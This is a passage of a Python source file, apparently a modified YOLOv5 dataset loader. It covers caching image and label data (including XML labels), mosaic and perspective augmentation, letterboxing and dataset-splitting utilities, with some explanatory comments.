labels_path_xml = ['xml'.join(x.replace(sa, sb, 1).rsplit(x.split('.')[-1], 1)) for x in img_paths]
return labels_path_txt
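# Worked example (added note): on a POSIX layout the mapping above turns
# 'datasets/coco/images/train/0001.jpg' into 'datasets/coco/labels/train/0001.txt':
# the first '/images/' component is swapped for '/labels/' and the file extension is
# replaced by 'txt' (the parallel '.xml' list is computed but not returned).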
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
# cache_path = Path("".join([str(Path(self.img_files[0]).parent).split('images')[0], "labels.cache"]))
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels
if cache_path.is_file():
cache, exists = torch.load(cache_path), True # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed
cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# cache, exists = self.new_cache_labels(cache_path, prefix), False
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
cache.pop('version') # remove version
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def new_cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, duplicate
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
if lb_file.split(".")[-1] == "xml":
# with open(lb_file, 'r') as f:
l = xml2txt(lb_file, lb_file)
# l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def hist_equalize(img, clahe=True, bgr=False):
# Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
yuv[:, :, 0] = cv2.equalizeHist(yuv[:, :, 0]) # equalize Y channel histogram
return cv2.cvtColor(yuv, cv2.COLOR_YUV2BGR if bgr else cv2.COLOR_YUV2RGB) # convert YUV image to RGB
def load_mosaic(self, index):
# loads images in a 4-mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# loads images in a 9-mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img9
if i == 0: # center
img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8) # base image with 9 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = [max(x, 0) for x in c] # allocate coords
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padx, pady) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padx, pady) for x in segments]
labels9.append(labels)
segments9.extend(segments)
# Image
img9[y1:y2, x1:x2] = img[y1 - pady:, x1 - padx:] # img9[ymin:ymax, xmin:xmax]
hp, wp = h, w # height, width previous
# Offset
yc, xc = [int(random.uniform(0, s)) for _ in self.mosaic_border] # mosaic center x, y
img9 = img9[yc:yc + 2 * s, xc:xc + 2 * s]
# Concat/clip labels
labels9 = np.concatenate(labels9, 0)
labels9[:, [1, 3]] -= xc
labels9[:, [2, 4]] -= yc
c = np.array([xc, yc]) # centers
segments9 = [x - c for x in segments9]
for x in (labels9[:, 1:], *segments9):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img9, labels9 = replicate(img9, labels9) # replicate
# Augment
img9, labels9 = random_perspective(img9, labels9, segments9,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img9, labels9
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True, stride=32):
# Resize and pad image while meeting stride-multiple constraints
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
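# Editor's note: illustrative usage sketch, not part of the original file. letterbox()
# resizes while preserving aspect ratio, then pads to a stride multiple (auto=True) or to
# the exact new_shape; the returned ratio and (dw, dh) padding are what you need to map
# detections back onto the original image:
#
# im0 = cv2.imread('example.jpg') # placeholder path
# im, ratio, (dw, dh) = letterbox(im0, new_shape=640, auto=True, stride=32)
# # with auto=True both sides of im are multiples of 32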
def random_perspective(img, targets=(), segments=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0,
border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
use_segments = any(x.any() for x in segments)
new = np.zeros((n, 4))
if use_segments: # warp segments
segments = resample_segments(segments) # upsample
for i, segment in enumerate(segments):
xy = np.ones((len(segment), 3))
xy[:, :2] = segment
xy = xy @ M.T # transform
xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine
# clip
new[i] = segment2box(xy, width, height)
else: # warp boxes
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# clip
new[:, [0, 2]] = new[:, [0, 2]].clip(0, width)
new[:, [1, 3]] = new[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10)
targets = targets[i]
targets[:, 1:5] = new[i]
return img, targets
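# Editor's note: illustrative note, not part of the original file. random_perspective()
# composes Center -> Perspective -> Rotation/Scale -> Shear -> Translation into a single
# 3x3 matrix (M = T @ S @ R @ P @ C) and warps the image once; box labels are transformed
# by applying M to their corners and re-fitting axis-aligned boxes, then filtered with
# box_candidates(). A hedged usage sketch:
#
# img, targets = random_perspective(img, targets, degrees=10, translate=0.1, scale=0.5, shear=10)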
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates
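# Editor's note: illustrative worked example, not part of the original file. box_candidates()
# keeps boxes whose width and height both exceed wh_thr pixels, whose area is at least
# area_thr of the pre-augmentation area, and whose aspect ratio stays below ar_thr.
# E.g. a 100x10 box warped to 80x8 is kept (area ratio 0.64, aspect ratio 10), while the
# same box shrunk to 30x1 is rejected (height <= 2 px, area ratio 0.03).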
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
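# Editor's note: illustrative usage sketch, not part of the original file. cutout() paints
# random rectangles of decreasing size onto the image in place, then drops labels that are
# more than 60% covered (intersection over the label's own area via bbox_ioa):
#
# labels = cutout(img, labels) # img is modified in place, the filtered labels are returned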
def create_folder(path='./new'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def flatten_recursive(path='../coco128'):
# Flatten a recursive directory by bringing all files to top level
new_path = Path(path + '_flat')
create_folder(new_path)
for file in tqdm(glob.glob(str(Path(path)) + '/**/*.*', recursive=True)):
shutil.copyfile(file, new_path / Path(file).name)
def extract_boxes(path='../coco128/'): # from utils.datasets import *; extract_boxes('../coco128')
# Convert detection dataset into classification dataset, with one directory per class
path = Path(path) # images dir
shutil.rmtree(path / 'classifier') if (path / 'classifier').is_dir() else None # remove existing
files = list(path.rglob('*.*'))
n = len(files) # number of files
for im_file in tqdm(files, total=n):
if im_file.suffix[1:] in img_formats:
# image
im = cv2.imread(str(im_file))[..., ::-1] # BGR to RGB
h, w = im.shape[:2]
# labels
lb_file = Path(img2label_paths([str(im_file)])[0])
if Path(lb_file).exists():
with open(lb_file, 'r') as f:
lb = np.array([x.split() for x in f.read().strip().splitlines()], dtype=np.float32) # labels
for j, x in enumerate(lb):
c = int(x[0]) # class
f = (path / 'classifier') / f'{c}' / f'{path.stem}_{im_file.stem}_{j}.jpg' # new filename
if not f.parent.is_dir():
f.parent.mkdir(parents=True)
b = x[1:] * [w, h, w, h] # box
# b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.2 + 3 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int) # np.int is deprecated; use the builtin int
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(str(f), im[b[1]:b[3], b[0]:b[2]]), f'box failure in {f}'
def autosplit(path='../coco128', weights=(0.9, 0.1, 0.0), annotated_only=False):
""" Autosplit a dataset into train/val/test splits and save path/autosplit_*.txt files
Usage: from utils.datasets import *; autosplit('../coco128')
Arguments
path: Path to images directory
weights: Train, val, test weights (list)
annotated_only: Only use images with an annotated txt file
"""
path = Path(path) # images dir
files = sum([list(path.rglob(f"*.{img_ext}")) for img_ext in img_formats], []) # image files only
n = len(files) # number of files
indices = random.choices([0, 1, 2], weights=weights, k=n) # assign each image to a split
txt = ['autosplit_train.txt', 'autosplit_val.txt', 'autosplit_test.txt'] # 3 txt files
[(path / x).unlink() for x in txt if (path / x).exists()] # remove existing
print(f'Autosplitting images from {path}' + ', using *.txt labeled images only' * annotated_only)
